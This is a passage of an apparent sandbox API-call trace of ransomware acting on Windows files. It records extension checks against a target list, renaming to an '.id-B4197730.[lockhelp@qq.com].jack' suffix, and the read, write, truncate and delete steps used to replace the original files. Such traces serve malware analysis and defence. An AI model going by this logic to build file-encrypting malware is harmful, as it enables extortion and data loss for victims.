(lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.619] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=233) returned 1 [0199.619] CloseHandle (hObject=0x404) returned 1 [0199.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0x20 [0199.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.620] lstrlenW (lpString=".doc") returned 4 [0199.620] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0199.620] lstrlenW (lpString=".docx") returned 5 [0199.620] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0199.620] lstrlenW (lpString=".pdf") returned 4 [0199.620] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0199.620] lstrlenW (lpString=".xls") returned 4 [0199.620] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0199.620] lstrlenW (lpString=".xlsx") returned 5 [0199.620] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0199.620] lstrlenW (lpString=".ppt") returned 4 [0199.620] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0199.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.620] lstrlenW (lpString=".zip") returned 4 [0199.620] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0199.620] lstrlenW (lpString=".rar") returned 4 [0199.620] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0199.620] lstrlenW (lpString=".bz2") returned 4 [0199.620] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0199.620] lstrlenW (lpString=".7z") returned 3 [0199.620] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0199.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.621] lstrlenW (lpString=".dbf") returned 4 [0199.621] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0199.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.621] lstrlenW (lpString=".1cd") returned 4 [0199.621] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0199.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.621] lstrlenW (lpString=".jpg") returned 4 [0199.621] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0199.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.621] lstrlenW (lpString=".doc") returned 4 [0199.621] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0199.621] lstrlenW (lpString=".docx") returned 5 [0199.621] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0199.621] lstrlenW (lpString=".pdf") returned 4 [0199.621] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0199.621] lstrlenW (lpString=".xls") returned 4 [0199.621] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0199.621] lstrlenW (lpString=".xlsx") returned 5 [0199.621] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0199.621] lstrlenW (lpString=".ppt") returned 4 [0199.621] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0199.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.621] lstrlenW (lpString=".zip") returned 4 [0199.621] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0199.621] lstrlenW (lpString=".rar") returned 4 [0199.622] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0199.622] lstrlenW (lpString=".bz2") returned 4 [0199.622] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0199.622] lstrlenW (lpString=".7z") returned 3 [0199.622] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0199.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.622] lstrlenW (lpString=".dbf") returned 4 [0199.622] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0199.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.622] lstrlenW (lpString=".1cd") returned 4 [0199.622] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0199.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 67 [0199.622] lstrlenW (lpString=".jpg") returned 4 [0199.622] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0199.622] lstrcmpiW (lpString1=".jpg", lpString2=".jack") returned 1 [0199.622] lstrlenW (lpString="Roses.jpg") returned 9 [0199.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.625] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=1920) returned 1 [0199.625] CloseHandle (hObject=0x404) returned 1 [0199.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0x20 [0199.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.625] lstrlenW (lpString=".doc") returned 4 [0199.625] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.625] lstrlenW (lpString=".docx") returned 5 [0199.625] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0199.625] lstrlenW (lpString=".pdf") returned 4 [0199.625] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.625] lstrlenW (lpString=".xls") returned 4 [0199.625] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.625] lstrlenW (lpString=".xlsx") returned 5 [0199.626] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0199.626] lstrlenW (lpString=".ppt") returned 4 [0199.626] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.626] lstrlenW (lpString=".zip") returned 4 [0199.626] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.626] lstrlenW (lpString=".rar") returned 4 [0199.626] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.626] lstrlenW (lpString=".bz2") returned 4 [0199.626] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.626] lstrlenW (lpString=".7z") returned 3 [0199.626] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.626] lstrlenW (lpString=".dbf") returned 4 [0199.626] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.626] lstrlenW (lpString=".1cd") returned 4 [0199.626] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.626] lstrlenW (lpString=".jpg") returned 4 [0199.626] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.626] lstrlenW (lpString=".doc") returned 4 [0199.626] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.626] lstrlenW (lpString=".docx") returned 5 [0199.626] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0199.627] lstrlenW (lpString=".pdf") returned 4 [0199.627] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.627] lstrlenW (lpString=".xls") returned 4 [0199.627] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.627] lstrlenW (lpString=".xlsx") returned 5 [0199.627] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0199.627] lstrlenW (lpString=".ppt") returned 4 [0199.627] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.627] lstrlenW (lpString=".zip") returned 4 [0199.627] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.627] lstrlenW (lpString=".rar") returned 4 [0199.627] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.627] lstrlenW (lpString=".bz2") returned 4 [0199.627] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.627] lstrlenW (lpString=".7z") returned 3 [0199.627] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.627] lstrlenW (lpString=".dbf") returned 4 [0199.627] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.627] lstrlenW (lpString=".1cd") returned 4 [0199.627] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 67 [0199.627] lstrlenW (lpString=".jpg") returned 4 [0199.627] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.628] lstrcmpiW (lpString1=".jpg", lpString2=".jack") returned 1 [0199.628] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0199.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.688] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=4734) returned 1 [0199.688] CloseHandle (hObject=0x404) returned 1 [0199.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg")) returned 0x20 [0199.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.688] lstrlenW (lpString=".doc") returned 4 [0199.688] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.688] lstrlenW (lpString=".docx") returned 5 [0199.688] lstrcmpiW (lpString1=".docx", lpString2="e.jpg") returned -1 [0199.688] lstrlenW (lpString=".pdf") returned 4 [0199.688] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.688] lstrlenW (lpString=".xls") returned 4 [0199.688] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.689] lstrlenW (lpString=".xlsx") returned 5 [0199.689] lstrcmpiW (lpString1=".xlsx", lpString2="e.jpg") returned -1 [0199.689] lstrlenW (lpString=".ppt") returned 4 [0199.689] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.689] lstrlenW (lpString=".zip") returned 4 [0199.689] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.689] lstrlenW (lpString=".rar") returned 4 [0199.689] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.689] lstrlenW (lpString=".bz2") returned 4 [0199.689] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.689] lstrlenW (lpString=".7z") returned 3 [0199.689] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.689] lstrlenW (lpString=".dbf") returned 4 [0199.689] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.689] lstrlenW (lpString=".1cd") returned 4 [0199.689] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.689] lstrlenW (lpString=".jpg") returned 4 [0199.689] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.689] lstrlenW (lpString=".doc") returned 4 [0199.690] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.690] lstrlenW (lpString=".docx") returned 5 [0199.690] lstrcmpiW (lpString1=".docx", lpString2="e.jpg") returned -1 [0199.690] lstrlenW (lpString=".pdf") returned 4 [0199.690] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.690] lstrlenW (lpString=".xls") returned 4 [0199.690] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.690] lstrlenW (lpString=".xlsx") returned 5 [0199.690] lstrcmpiW (lpString1=".xlsx", lpString2="e.jpg") returned -1 [0199.690] lstrlenW (lpString=".ppt") returned 4 [0199.690] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.690] lstrlenW (lpString=".zip") returned 4 [0199.690] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.690] lstrlenW (lpString=".rar") returned 4 [0199.690] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.690] lstrlenW (lpString=".bz2") returned 4 [0199.690] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.690] lstrlenW (lpString=".7z") returned 3 [0199.690] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.690] lstrlenW (lpString=".dbf") returned 4 [0199.690] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.690] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.690] lstrlenW (lpString=".1cd") returned 4 [0199.690] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 74 [0199.691] lstrlenW (lpString=".jpg") returned 4 [0199.691] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.691] lstrcmpiW (lpString1=".jpg", lpString2=".jack") returned 1 [0199.691] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0199.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0199.696] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=10569) returned 1 [0199.696] CloseHandle (hObject=0x41c) returned 1 [0199.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg")) returned 0x20 [0199.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 70 [0199.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 70 [0199.696] lstrlenW (lpString=".doc") returned 4 [0199.696] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.696] lstrlenW (lpString=".docx") returned 5 [0199.696] lstrcmpiW (lpString1=".docx", lpString2="e.jpg") returned -1 [0199.696] lstrlenW (lpString=".pdf") returned 4 [0199.696] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.696] lstrlenW (lpString=".xls") returned 4 [0199.696] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.696] lstrlenW (lpString=".xlsx") returned 5 [0199.697] lstrcmpiW (lpString1=".xlsx", lpString2="e.jpg") returned -1 [0199.697] lstrlenW (lpString=".ppt") returned 4 [0199.697] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 70 [0199.697] lstrlenW (lpString=".zip") returned 4 [0199.697] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.697] lstrlenW (lpString=".rar") returned 4 [0199.697] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.697] lstrlenW (lpString=".bz2") returned 4 [0199.697] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.697] lstrlenW (lpString=".7z") returned 3 [0199.697] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 70 [0199.697] lstrlenW (lpString=".dbf") returned 4 [0199.697] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.938] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.938] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.939] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0199.939] GetLastError () returned 0x0 [0199.939] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x218e, lpOverlapped=0x0) returned 1 [0200.203] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x2190, lpOverlapped=0x0) returned 1 [0200.204] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.204] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xe8, lpOverlapped=0x0) returned 1 [0200.204] SetEndOfFile (hFile=0x434) returned 1 [0200.204] CloseHandle (hObject=0x434) returned 1 [0201.577] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.577] SetEndOfFile (hFile=0x41c) returned 1 [0201.828] CloseHandle (hObject=0x41c) returned 1 [0201.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.829] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif")) returned 1 [0201.829] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.829] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.829] lstrlenW (lpString=".doc") returned 4 [0201.829] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.829] lstrlenW (lpString=".docx") returned 5 [0201.829] lstrcmpiW (lpString1=".docx", lpString2="h.gif") returned -1 [0201.829] lstrlenW (lpString=".pdf") returned 4 [0201.829] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.829] lstrlenW (lpString=".xls") returned 4 [0201.829] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.829] lstrlenW (lpString=".xlsx") returned 5 [0201.829] lstrcmpiW (lpString1=".xlsx", lpString2="h.gif") returned -1 [0201.829] lstrlenW (lpString=".ppt") returned 4 [0201.829] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.829] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.830] lstrlenW (lpString=".zip") returned 4 [0201.830] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.830] lstrlenW (lpString=".rar") returned 4 [0201.830] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.830] lstrlenW (lpString=".bz2") returned 4 [0201.830] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.830] lstrlenW (lpString=".7z") returned 3 [0201.830] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.830] lstrlenW (lpString=".dbf") returned 4 [0201.830] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.830] lstrlenW (lpString=".1cd") returned 4 [0201.830] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.830] lstrlenW (lpString=".jpg") returned 4 [0201.830] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.830] lstrlenW (lpString=".doc") returned 4 [0201.830] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.830] lstrlenW (lpString=".docx") returned 5 [0201.830] lstrcmpiW (lpString1=".docx", lpString2="h.gif") returned -1 [0201.830] lstrlenW (lpString=".pdf") returned 4 [0201.830] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.830] lstrlenW (lpString=".xls") returned 4 [0201.830] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.830] lstrlenW (lpString=".xlsx") returned 5 [0201.830] lstrcmpiW (lpString1=".xlsx", lpString2="h.gif") returned -1 [0201.830] lstrlenW (lpString=".ppt") returned 4 [0201.830] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.830] lstrlenW (lpString=".zip") returned 4 [0201.830] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.830] lstrlenW (lpString=".rar") returned 4 [0201.830] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.830] lstrlenW (lpString=".bz2") returned 4 [0201.831] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.831] lstrlenW (lpString=".7z") returned 3 [0201.831] lstrcmpiW 